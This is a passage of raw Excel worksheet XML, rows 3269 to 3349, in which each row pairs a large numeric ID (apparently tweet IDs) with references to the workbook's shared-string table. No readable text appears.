    <row r="3269" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3269">
        <v>1.2348837355997701E+18</v>
      </c>
      <c r="B3269" t="s">
        <v>8194</v>
      </c>
      <c r="C3269" t="s">
        <v>1</v>
      </c>
      <c r="D3269" t="s">
        <v>8195</v>
      </c>
      <c r="E3269" t="s">
        <v>3877</v>
      </c>
    </row>
    <row r="3270" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3270">
        <v>1.2348832634260201E+18</v>
      </c>
      <c r="B3270" t="s">
        <v>8196</v>
      </c>
      <c r="C3270" t="s">
        <v>1</v>
      </c>
      <c r="D3270" t="s">
        <v>8197</v>
      </c>
      <c r="E3270" t="s">
        <v>8198</v>
      </c>
    </row>
    <row r="3271" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3271">
        <v>1.2348831896944799E+18</v>
      </c>
      <c r="B3271" t="s">
        <v>8199</v>
      </c>
      <c r="C3271" t="s">
        <v>1</v>
      </c>
      <c r="D3271" t="s">
        <v>8200</v>
      </c>
      <c r="E3271" t="s">
        <v>8201</v>
      </c>
    </row>
    <row r="3272" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3272">
        <v>1.2348827424221299E+18</v>
      </c>
      <c r="B3272" t="s">
        <v>8202</v>
      </c>
      <c r="C3272" t="s">
        <v>1</v>
      </c>
      <c r="D3272" t="s">
        <v>8203</v>
      </c>
      <c r="E3272" t="s">
        <v>8204</v>
      </c>
    </row>
    <row r="3273" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3273">
        <v>1.23488273440689E+18</v>
      </c>
      <c r="B3273" t="s">
        <v>8205</v>
      </c>
      <c r="C3273" t="s">
        <v>1</v>
      </c>
      <c r="D3273" t="s">
        <v>2186</v>
      </c>
      <c r="E3273" t="s">
        <v>2102</v>
      </c>
    </row>
    <row r="3274" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3274">
        <v>1.23488248714847E+18</v>
      </c>
      <c r="B3274" t="s">
        <v>8206</v>
      </c>
      <c r="C3274" t="s">
        <v>1</v>
      </c>
      <c r="D3274" t="s">
        <v>8207</v>
      </c>
      <c r="E3274" t="s">
        <v>8208</v>
      </c>
    </row>
    <row r="3275" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3275">
        <v>1.23488244723971E+18</v>
      </c>
      <c r="B3275" t="s">
        <v>8209</v>
      </c>
      <c r="C3275" t="s">
        <v>1</v>
      </c>
      <c r="D3275" t="s">
        <v>8210</v>
      </c>
      <c r="E3275" t="s">
        <v>8211</v>
      </c>
    </row>
    <row r="3276" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3276">
        <v>1.2348817069031601E+18</v>
      </c>
      <c r="B3276" t="s">
        <v>8212</v>
      </c>
      <c r="C3276" t="s">
        <v>1</v>
      </c>
      <c r="D3276" t="s">
        <v>8213</v>
      </c>
      <c r="E3276" t="s">
        <v>5425</v>
      </c>
    </row>
    <row r="3277" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3277">
        <v>1.2348813582683699E+18</v>
      </c>
      <c r="B3277" t="s">
        <v>8214</v>
      </c>
      <c r="C3277" t="s">
        <v>1</v>
      </c>
      <c r="D3277" t="s">
        <v>8215</v>
      </c>
      <c r="E3277" t="s">
        <v>8216</v>
      </c>
    </row>
    <row r="3278" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3278">
        <v>1.2348812357695201E+18</v>
      </c>
      <c r="B3278" t="s">
        <v>8217</v>
      </c>
      <c r="C3278" t="s">
        <v>1</v>
      </c>
      <c r="D3278" t="s">
        <v>8218</v>
      </c>
      <c r="E3278" t="s">
        <v>8219</v>
      </c>
    </row>
    <row r="3279" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3279">
        <v>1.2348810972483E+18</v>
      </c>
      <c r="B3279" t="s">
        <v>8220</v>
      </c>
      <c r="C3279" t="s">
        <v>1</v>
      </c>
      <c r="D3279" t="s">
        <v>8221</v>
      </c>
      <c r="E3279" t="s">
        <v>8222</v>
      </c>
    </row>
    <row r="3280" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3280">
        <v>1.23488098657342E+18</v>
      </c>
      <c r="B3280" t="s">
        <v>8223</v>
      </c>
      <c r="C3280" t="s">
        <v>1</v>
      </c>
      <c r="D3280" t="s">
        <v>8224</v>
      </c>
      <c r="E3280" t="s">
        <v>8216</v>
      </c>
    </row>
    <row r="3281" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3281">
        <v>1.2348802366569999E+18</v>
      </c>
      <c r="B3281" t="s">
        <v>8225</v>
      </c>
      <c r="C3281" t="s">
        <v>1</v>
      </c>
      <c r="D3281" t="s">
        <v>8226</v>
      </c>
      <c r="E3281" t="s">
        <v>8227</v>
      </c>
    </row>
    <row r="3282" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3282">
        <v>1.23488006125122E+18</v>
      </c>
      <c r="B3282" t="s">
        <v>8228</v>
      </c>
      <c r="C3282" t="s">
        <v>1</v>
      </c>
      <c r="D3282" t="s">
        <v>8229</v>
      </c>
      <c r="E3282" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="3283" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3283">
        <v>1.2348794442690401E+18</v>
      </c>
      <c r="B3283" t="s">
        <v>8230</v>
      </c>
      <c r="C3283" t="s">
        <v>1</v>
      </c>
      <c r="D3283" t="s">
        <v>8231</v>
      </c>
      <c r="E3283" t="s">
        <v>2395</v>
      </c>
    </row>
    <row r="3284" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3284">
        <v>1.2348791678644101E+18</v>
      </c>
      <c r="B3284" t="s">
        <v>8232</v>
      </c>
      <c r="C3284" t="s">
        <v>1</v>
      </c>
      <c r="D3284" t="s">
        <v>8233</v>
      </c>
      <c r="E3284" t="s">
        <v>1921</v>
      </c>
    </row>
    <row r="3285" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3285">
        <v>1.2348790085394099E+18</v>
      </c>
      <c r="B3285" t="s">
        <v>8234</v>
      </c>
      <c r="C3285" t="s">
        <v>1</v>
      </c>
      <c r="D3285" t="s">
        <v>8235</v>
      </c>
      <c r="E3285" t="s">
        <v>8236</v>
      </c>
    </row>
    <row r="3286" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3286">
        <v>1.23487887260638E+18</v>
      </c>
      <c r="B3286" t="s">
        <v>8237</v>
      </c>
      <c r="C3286" t="s">
        <v>1</v>
      </c>
      <c r="D3286" t="s">
        <v>8238</v>
      </c>
      <c r="E3286" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="3287" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3287">
        <v>1.23487876500989E+18</v>
      </c>
      <c r="B3287" t="s">
        <v>8239</v>
      </c>
      <c r="C3287" t="s">
        <v>1</v>
      </c>
      <c r="D3287" t="s">
        <v>8240</v>
      </c>
      <c r="E3287" t="s">
        <v>8241</v>
      </c>
    </row>
    <row r="3288" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3288">
        <v>1.2348787309773701E+18</v>
      </c>
      <c r="B3288" t="s">
        <v>8242</v>
      </c>
      <c r="C3288" t="s">
        <v>1</v>
      </c>
      <c r="D3288" t="s">
        <v>8243</v>
      </c>
      <c r="E3288" t="s">
        <v>8244</v>
      </c>
    </row>
    <row r="3289" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3289">
        <v>1.23487871606242E+18</v>
      </c>
      <c r="B3289" t="s">
        <v>8245</v>
      </c>
      <c r="C3289" t="s">
        <v>1</v>
      </c>
      <c r="D3289" t="s">
        <v>8246</v>
      </c>
      <c r="E3289" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="3290" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3290">
        <v>1.23487859937683E+18</v>
      </c>
      <c r="B3290" t="s">
        <v>8247</v>
      </c>
      <c r="C3290" t="s">
        <v>1</v>
      </c>
      <c r="D3290" t="s">
        <v>8248</v>
      </c>
      <c r="E3290" t="s">
        <v>1939</v>
      </c>
    </row>
    <row r="3291" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3291">
        <v>1.2348782310414899E+18</v>
      </c>
      <c r="B3291" t="s">
        <v>8249</v>
      </c>
      <c r="C3291" t="s">
        <v>1</v>
      </c>
      <c r="D3291" t="s">
        <v>8250</v>
      </c>
      <c r="E3291" t="s">
        <v>2901</v>
      </c>
    </row>
    <row r="3292" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3292">
        <v>1.2348781843463199E+18</v>
      </c>
      <c r="B3292" t="s">
        <v>8251</v>
      </c>
      <c r="C3292" t="s">
        <v>1</v>
      </c>
      <c r="D3292" t="s">
        <v>8252</v>
      </c>
      <c r="E3292" t="s">
        <v>8253</v>
      </c>
    </row>
    <row r="3293" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3293">
        <v>1.2348781530735401E+18</v>
      </c>
      <c r="B3293" t="s">
        <v>8254</v>
      </c>
      <c r="C3293" t="s">
        <v>1</v>
      </c>
      <c r="D3293" t="s">
        <v>8255</v>
      </c>
      <c r="E3293" t="s">
        <v>8256</v>
      </c>
    </row>
    <row r="3294" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3294">
        <v>1.2348781203328E+18</v>
      </c>
      <c r="B3294" t="s">
        <v>8257</v>
      </c>
      <c r="C3294" t="s">
        <v>1</v>
      </c>
      <c r="D3294" t="s">
        <v>8258</v>
      </c>
      <c r="E3294" t="s">
        <v>5493</v>
      </c>
    </row>
    <row r="3295" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3295">
        <v>1.23487811363457E+18</v>
      </c>
      <c r="B3295" t="s">
        <v>8259</v>
      </c>
      <c r="C3295" t="s">
        <v>1</v>
      </c>
      <c r="D3295" t="s">
        <v>8260</v>
      </c>
      <c r="E3295" t="s">
        <v>8261</v>
      </c>
    </row>
    <row r="3296" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3296">
        <v>1.23487802258461E+18</v>
      </c>
      <c r="B3296" t="s">
        <v>8262</v>
      </c>
      <c r="C3296" t="s">
        <v>1</v>
      </c>
      <c r="D3296" t="s">
        <v>8263</v>
      </c>
      <c r="E3296" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="3297" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3297">
        <v>1.23487798859809E+18</v>
      </c>
      <c r="B3297" t="s">
        <v>8264</v>
      </c>
      <c r="C3297" t="s">
        <v>1</v>
      </c>
      <c r="D3297" t="s">
        <v>8265</v>
      </c>
      <c r="E3297" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="3298" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3298">
        <v>1.23487793747378E+18</v>
      </c>
      <c r="B3298" t="s">
        <v>8266</v>
      </c>
      <c r="C3298" t="s">
        <v>1</v>
      </c>
      <c r="D3298" t="s">
        <v>8267</v>
      </c>
      <c r="E3298" t="s">
        <v>2901</v>
      </c>
    </row>
    <row r="3299" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3299">
        <v>1.23487767127809E+18</v>
      </c>
      <c r="B3299" t="s">
        <v>8268</v>
      </c>
      <c r="C3299" t="s">
        <v>1</v>
      </c>
      <c r="D3299" t="s">
        <v>8269</v>
      </c>
      <c r="E3299" t="s">
        <v>8270</v>
      </c>
    </row>
    <row r="3300" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3300">
        <v>1.2348776666643599E+18</v>
      </c>
      <c r="B3300" t="s">
        <v>8271</v>
      </c>
      <c r="C3300" t="s">
        <v>1</v>
      </c>
      <c r="D3300" t="s">
        <v>8272</v>
      </c>
      <c r="E3300" t="s">
        <v>2901</v>
      </c>
    </row>
    <row r="3301" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3301">
        <v>1.2348775736010701E+18</v>
      </c>
      <c r="B3301" t="s">
        <v>8273</v>
      </c>
      <c r="C3301" t="s">
        <v>1</v>
      </c>
      <c r="D3301" t="s">
        <v>8274</v>
      </c>
      <c r="E3301" t="s">
        <v>6028</v>
      </c>
    </row>
    <row r="3302" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3302">
        <v>1.2348775541689201E+18</v>
      </c>
      <c r="B3302" t="s">
        <v>8275</v>
      </c>
      <c r="C3302" t="s">
        <v>1</v>
      </c>
      <c r="D3302" t="s">
        <v>8276</v>
      </c>
      <c r="E3302" t="s">
        <v>8277</v>
      </c>
    </row>
    <row r="3303" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3303">
        <v>1.2348775512789801E+18</v>
      </c>
      <c r="B3303" t="s">
        <v>8278</v>
      </c>
      <c r="C3303" t="s">
        <v>1</v>
      </c>
      <c r="D3303" t="s">
        <v>8279</v>
      </c>
      <c r="E3303" t="s">
        <v>6037</v>
      </c>
    </row>
    <row r="3304" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3304">
        <v>1.23487750051537E+18</v>
      </c>
      <c r="B3304" t="s">
        <v>8280</v>
      </c>
      <c r="C3304" t="s">
        <v>1</v>
      </c>
      <c r="D3304" t="s">
        <v>8281</v>
      </c>
      <c r="E3304" t="s">
        <v>6040</v>
      </c>
    </row>
    <row r="3305" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3305">
        <v>1.2348774750349901E+18</v>
      </c>
      <c r="B3305" t="s">
        <v>8282</v>
      </c>
      <c r="C3305" t="s">
        <v>1</v>
      </c>
      <c r="D3305" t="s">
        <v>8283</v>
      </c>
      <c r="E3305" t="s">
        <v>4809</v>
      </c>
    </row>
    <row r="3306" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3306">
        <v>1.23487741189395E+18</v>
      </c>
      <c r="B3306" t="s">
        <v>8284</v>
      </c>
      <c r="C3306" t="s">
        <v>1</v>
      </c>
      <c r="D3306" t="s">
        <v>8285</v>
      </c>
      <c r="E3306" t="s">
        <v>8286</v>
      </c>
    </row>
    <row r="3307" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3307">
        <v>1.23487739707539E+18</v>
      </c>
      <c r="B3307" t="s">
        <v>8287</v>
      </c>
      <c r="C3307" t="s">
        <v>1</v>
      </c>
      <c r="D3307" t="s">
        <v>8288</v>
      </c>
      <c r="E3307" t="s">
        <v>5726</v>
      </c>
    </row>
    <row r="3308" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3308">
        <v>1.2348773483795899E+18</v>
      </c>
      <c r="B3308" t="s">
        <v>8289</v>
      </c>
      <c r="C3308" t="s">
        <v>1</v>
      </c>
      <c r="D3308" t="s">
        <v>8290</v>
      </c>
      <c r="E3308" t="s">
        <v>8291</v>
      </c>
    </row>
    <row r="3309" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3309">
        <v>1.2348772784186099E+18</v>
      </c>
      <c r="B3309" t="s">
        <v>8292</v>
      </c>
      <c r="C3309" t="s">
        <v>1</v>
      </c>
      <c r="D3309" t="s">
        <v>8293</v>
      </c>
      <c r="E3309" t="s">
        <v>7201</v>
      </c>
    </row>
    <row r="3310" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3310">
        <v>1.23487727631296E+18</v>
      </c>
      <c r="B3310" t="s">
        <v>8292</v>
      </c>
      <c r="C3310" t="s">
        <v>1</v>
      </c>
      <c r="D3310" t="s">
        <v>8294</v>
      </c>
      <c r="E3310" t="s">
        <v>7201</v>
      </c>
    </row>
    <row r="3311" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3311">
        <v>1.23487699471169E+18</v>
      </c>
      <c r="B3311" t="s">
        <v>8295</v>
      </c>
      <c r="C3311" t="s">
        <v>1</v>
      </c>
      <c r="D3311" t="s">
        <v>8296</v>
      </c>
      <c r="E3311" t="s">
        <v>885</v>
      </c>
    </row>
    <row r="3312" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3312">
        <v>1.2348767960022899E+18</v>
      </c>
      <c r="B3312" t="s">
        <v>8297</v>
      </c>
      <c r="C3312" t="s">
        <v>1</v>
      </c>
      <c r="D3312" t="s">
        <v>8298</v>
      </c>
      <c r="E3312" t="s">
        <v>5881</v>
      </c>
    </row>
    <row r="3313" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3313">
        <v>1.2348767187431501E+18</v>
      </c>
      <c r="B3313" t="s">
        <v>8299</v>
      </c>
      <c r="C3313" t="s">
        <v>1</v>
      </c>
      <c r="D3313" t="s">
        <v>8300</v>
      </c>
      <c r="E3313" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="3314" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3314">
        <v>1.2348765226928699E+18</v>
      </c>
      <c r="B3314" t="s">
        <v>8301</v>
      </c>
      <c r="C3314" t="s">
        <v>1</v>
      </c>
      <c r="D3314" t="s">
        <v>8302</v>
      </c>
      <c r="E3314" t="s">
        <v>8303</v>
      </c>
    </row>
    <row r="3315" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3315">
        <v>1.2348762209674099E+18</v>
      </c>
      <c r="B3315" t="s">
        <v>8304</v>
      </c>
      <c r="C3315" t="s">
        <v>1</v>
      </c>
      <c r="D3315" t="s">
        <v>8305</v>
      </c>
      <c r="E3315" t="s">
        <v>8306</v>
      </c>
    </row>
    <row r="3316" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3316">
        <v>1.23487621684866E+18</v>
      </c>
      <c r="B3316" t="s">
        <v>8307</v>
      </c>
      <c r="C3316" t="s">
        <v>1</v>
      </c>
      <c r="D3316" t="s">
        <v>8308</v>
      </c>
      <c r="E3316" t="s">
        <v>8309</v>
      </c>
    </row>
    <row r="3317" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3317">
        <v>1.23487593978125E+18</v>
      </c>
      <c r="B3317" t="s">
        <v>8310</v>
      </c>
      <c r="C3317" t="s">
        <v>1</v>
      </c>
      <c r="D3317" t="s">
        <v>8311</v>
      </c>
      <c r="E3317" t="s">
        <v>8312</v>
      </c>
    </row>
    <row r="3318" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3318">
        <v>1.2348759065455401E+18</v>
      </c>
      <c r="B3318" t="s">
        <v>8313</v>
      </c>
      <c r="C3318" t="s">
        <v>1</v>
      </c>
      <c r="D3318" t="s">
        <v>8314</v>
      </c>
      <c r="E3318" t="s">
        <v>8315</v>
      </c>
    </row>
    <row r="3319" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3319">
        <v>1.2348757930729001E+18</v>
      </c>
      <c r="B3319" t="s">
        <v>8316</v>
      </c>
      <c r="C3319" t="s">
        <v>1</v>
      </c>
      <c r="D3319" t="s">
        <v>8317</v>
      </c>
      <c r="E3319" t="s">
        <v>7250</v>
      </c>
    </row>
    <row r="3320" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3320">
        <v>1.2348757896545201E+18</v>
      </c>
      <c r="B3320" t="s">
        <v>8318</v>
      </c>
      <c r="C3320" t="s">
        <v>1</v>
      </c>
      <c r="D3320" t="s">
        <v>8319</v>
      </c>
      <c r="E3320" t="s">
        <v>7250</v>
      </c>
    </row>
    <row r="3321" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3321">
        <v>1.23487577919821E+18</v>
      </c>
      <c r="B3321" t="s">
        <v>8320</v>
      </c>
      <c r="C3321" t="s">
        <v>1</v>
      </c>
      <c r="D3321" t="s">
        <v>8321</v>
      </c>
      <c r="E3321" t="s">
        <v>8322</v>
      </c>
    </row>
    <row r="3322" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3322">
        <v>1.23487556083009E+18</v>
      </c>
      <c r="B3322" t="s">
        <v>8323</v>
      </c>
      <c r="C3322" t="s">
        <v>1</v>
      </c>
      <c r="D3322" t="s">
        <v>8324</v>
      </c>
      <c r="E3322" t="s">
        <v>885</v>
      </c>
    </row>
    <row r="3323" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3323">
        <v>1.2348755512503301E+18</v>
      </c>
      <c r="B3323" t="s">
        <v>8325</v>
      </c>
      <c r="C3323" t="s">
        <v>1</v>
      </c>
      <c r="D3323" t="s">
        <v>8326</v>
      </c>
      <c r="E3323" t="s">
        <v>8327</v>
      </c>
    </row>
    <row r="3324" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3324">
        <v>1.2348754884530601E+18</v>
      </c>
      <c r="B3324" t="s">
        <v>8328</v>
      </c>
      <c r="C3324" t="s">
        <v>1</v>
      </c>
      <c r="D3324" t="s">
        <v>8329</v>
      </c>
      <c r="E3324" t="s">
        <v>2513</v>
      </c>
    </row>
    <row r="3325" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3325">
        <v>1.23487543560494E+18</v>
      </c>
      <c r="B3325" t="s">
        <v>8330</v>
      </c>
      <c r="C3325" t="s">
        <v>1</v>
      </c>
      <c r="D3325" t="s">
        <v>8331</v>
      </c>
      <c r="E3325" t="s">
        <v>8332</v>
      </c>
    </row>
    <row r="3326" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3326">
        <v>1.2348750318193001E+18</v>
      </c>
      <c r="B3326" t="s">
        <v>8333</v>
      </c>
      <c r="C3326" t="s">
        <v>1</v>
      </c>
      <c r="D3326" t="s">
        <v>8334</v>
      </c>
      <c r="E3326" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="3327" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3327">
        <v>1.2348749577143301E+18</v>
      </c>
      <c r="B3327" t="s">
        <v>8335</v>
      </c>
      <c r="C3327" t="s">
        <v>1</v>
      </c>
      <c r="D3327" t="s">
        <v>8336</v>
      </c>
      <c r="E3327" t="s">
        <v>5823</v>
      </c>
    </row>
    <row r="3328" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3328">
        <v>1.2348748091479301E+18</v>
      </c>
      <c r="B3328" t="s">
        <v>8337</v>
      </c>
      <c r="C3328" t="s">
        <v>1</v>
      </c>
      <c r="D3328" t="s">
        <v>8338</v>
      </c>
      <c r="E3328" t="s">
        <v>8339</v>
      </c>
    </row>
    <row r="3329" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3329">
        <v>1.2348744350913201E+18</v>
      </c>
      <c r="B3329" t="s">
        <v>8340</v>
      </c>
      <c r="C3329" t="s">
        <v>1</v>
      </c>
      <c r="D3329" t="s">
        <v>8341</v>
      </c>
      <c r="E3329" t="s">
        <v>8342</v>
      </c>
    </row>
    <row r="3330" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3330">
        <v>1.2348743735400499E+18</v>
      </c>
      <c r="B3330" t="s">
        <v>8343</v>
      </c>
      <c r="C3330" t="s">
        <v>1</v>
      </c>
      <c r="D3330" t="s">
        <v>8344</v>
      </c>
      <c r="E3330" t="s">
        <v>5608</v>
      </c>
    </row>
    <row r="3331" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3331">
        <v>1.2348742554117499E+18</v>
      </c>
      <c r="B3331" t="s">
        <v>8345</v>
      </c>
      <c r="C3331" t="s">
        <v>1</v>
      </c>
      <c r="D3331" t="s">
        <v>8346</v>
      </c>
      <c r="E3331" t="s">
        <v>8347</v>
      </c>
    </row>
    <row r="3332" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3332">
        <v>1.2348740154010199E+18</v>
      </c>
      <c r="B3332" t="s">
        <v>8348</v>
      </c>
      <c r="C3332" t="s">
        <v>1</v>
      </c>
      <c r="D3332" t="s">
        <v>8349</v>
      </c>
      <c r="E3332" t="s">
        <v>8350</v>
      </c>
    </row>
    <row r="3333" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3333">
        <v>1.2348739352478899E+18</v>
      </c>
      <c r="B3333" t="s">
        <v>8351</v>
      </c>
      <c r="C3333" t="s">
        <v>1</v>
      </c>
      <c r="D3333" t="s">
        <v>8352</v>
      </c>
      <c r="E3333" t="s">
        <v>8353</v>
      </c>
    </row>
    <row r="3334" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3334">
        <v>1.2348738380406899E+18</v>
      </c>
      <c r="B3334" t="s">
        <v>8354</v>
      </c>
      <c r="C3334" t="s">
        <v>1</v>
      </c>
      <c r="D3334" t="s">
        <v>8355</v>
      </c>
      <c r="E3334" t="s">
        <v>5608</v>
      </c>
    </row>
    <row r="3335" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3335">
        <v>1.23487370128127E+18</v>
      </c>
      <c r="B3335" t="s">
        <v>8356</v>
      </c>
      <c r="C3335" t="s">
        <v>1</v>
      </c>
      <c r="D3335" t="s">
        <v>8357</v>
      </c>
      <c r="E3335" t="s">
        <v>8358</v>
      </c>
    </row>
    <row r="3336" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3336">
        <v>1.2348734240335201E+18</v>
      </c>
      <c r="B3336" t="s">
        <v>8359</v>
      </c>
      <c r="C3336" t="s">
        <v>1</v>
      </c>
      <c r="D3336" t="s">
        <v>8360</v>
      </c>
      <c r="E3336" t="s">
        <v>1757</v>
      </c>
    </row>
    <row r="3337" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3337">
        <v>1.2348732737515599E+18</v>
      </c>
      <c r="B3337" t="s">
        <v>8361</v>
      </c>
      <c r="C3337" t="s">
        <v>1</v>
      </c>
      <c r="D3337" t="s">
        <v>8362</v>
      </c>
      <c r="E3337" t="s">
        <v>8363</v>
      </c>
    </row>
    <row r="3338" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3338">
        <v>1.2348732061687401E+18</v>
      </c>
      <c r="B3338" t="s">
        <v>8364</v>
      </c>
      <c r="C3338" t="s">
        <v>1</v>
      </c>
      <c r="D3338" t="s">
        <v>8365</v>
      </c>
      <c r="E3338" t="s">
        <v>8366</v>
      </c>
    </row>
    <row r="3339" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3339">
        <v>1.2348730878181499E+18</v>
      </c>
      <c r="B3339" t="s">
        <v>8367</v>
      </c>
      <c r="C3339" t="s">
        <v>1</v>
      </c>
      <c r="D3339" t="s">
        <v>8368</v>
      </c>
      <c r="E3339" t="s">
        <v>7826</v>
      </c>
    </row>
    <row r="3340" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3340">
        <v>1.2348729532145201E+18</v>
      </c>
      <c r="B3340" t="s">
        <v>8369</v>
      </c>
      <c r="C3340" t="s">
        <v>1</v>
      </c>
      <c r="D3340" t="s">
        <v>8370</v>
      </c>
      <c r="E3340" t="s">
        <v>7450</v>
      </c>
    </row>
    <row r="3341" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3341">
        <v>1.23487295003103E+18</v>
      </c>
      <c r="B3341" t="s">
        <v>8371</v>
      </c>
      <c r="C3341" t="s">
        <v>1</v>
      </c>
      <c r="D3341" t="s">
        <v>8372</v>
      </c>
      <c r="E3341" t="s">
        <v>7452</v>
      </c>
    </row>
    <row r="3342" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3342">
        <v>1.2348728848557499E+18</v>
      </c>
      <c r="B3342" t="s">
        <v>8373</v>
      </c>
      <c r="C3342" t="s">
        <v>1</v>
      </c>
      <c r="D3342" t="s">
        <v>8374</v>
      </c>
      <c r="E3342" t="s">
        <v>8375</v>
      </c>
    </row>
    <row r="3343" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3343">
        <v>1.2348727958440499E+18</v>
      </c>
      <c r="B3343" t="s">
        <v>8376</v>
      </c>
      <c r="C3343" t="s">
        <v>1</v>
      </c>
      <c r="D3343" t="s">
        <v>8377</v>
      </c>
      <c r="E3343" t="s">
        <v>3035</v>
      </c>
    </row>
    <row r="3344" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3344">
        <v>1.2348727145208599E+18</v>
      </c>
      <c r="B3344" t="s">
        <v>8378</v>
      </c>
      <c r="C3344" t="s">
        <v>1</v>
      </c>
      <c r="D3344" t="s">
        <v>8379</v>
      </c>
      <c r="E3344" t="s">
        <v>6861</v>
      </c>
    </row>
    <row r="3345" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3345">
        <v>1.2348725803450701E+18</v>
      </c>
      <c r="B3345" t="s">
        <v>8380</v>
      </c>
      <c r="C3345" t="s">
        <v>1</v>
      </c>
      <c r="D3345" t="s">
        <v>8381</v>
      </c>
      <c r="E3345" t="s">
        <v>7843</v>
      </c>
    </row>
    <row r="3346" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3346">
        <v>1.2348724913880801E+18</v>
      </c>
      <c r="B3346" t="s">
        <v>8382</v>
      </c>
      <c r="C3346" t="s">
        <v>1</v>
      </c>
      <c r="D3346" t="s">
        <v>8383</v>
      </c>
      <c r="E3346" t="s">
        <v>1774</v>
      </c>
    </row>
    <row r="3347" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3347">
        <v>1.2348724663607501E+18</v>
      </c>
      <c r="B3347" t="s">
        <v>8384</v>
      </c>
      <c r="C3347" t="s">
        <v>1</v>
      </c>
      <c r="D3347" t="s">
        <v>8385</v>
      </c>
      <c r="E3347" t="s">
        <v>8386</v>
      </c>
    </row>
    <row r="3348" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3348">
        <v>1.2348724352263501E+18</v>
      </c>
      <c r="B3348" t="s">
        <v>8387</v>
      </c>
      <c r="C3348" t="s">
        <v>1</v>
      </c>
      <c r="D3348" t="s">
        <v>8388</v>
      </c>
      <c r="E3348" t="s">
        <v>8386</v>
      </c>
    </row>
    <row r="3349" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3349">
        <v>1.23487235756881E+18</v>
      </c>
      <c r="B3349" t="s">
        <v>8389</v>
      </c>
      <c r="C3349" t="s">
        <v>1</v>
      </c>
      <c r="D3349" t="s">
        <v>8390</v>
      </c>
      <c r="E3349" t="s">
        <v>8391</v>
      </c>
    </row>
    <row r="3350" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3350">
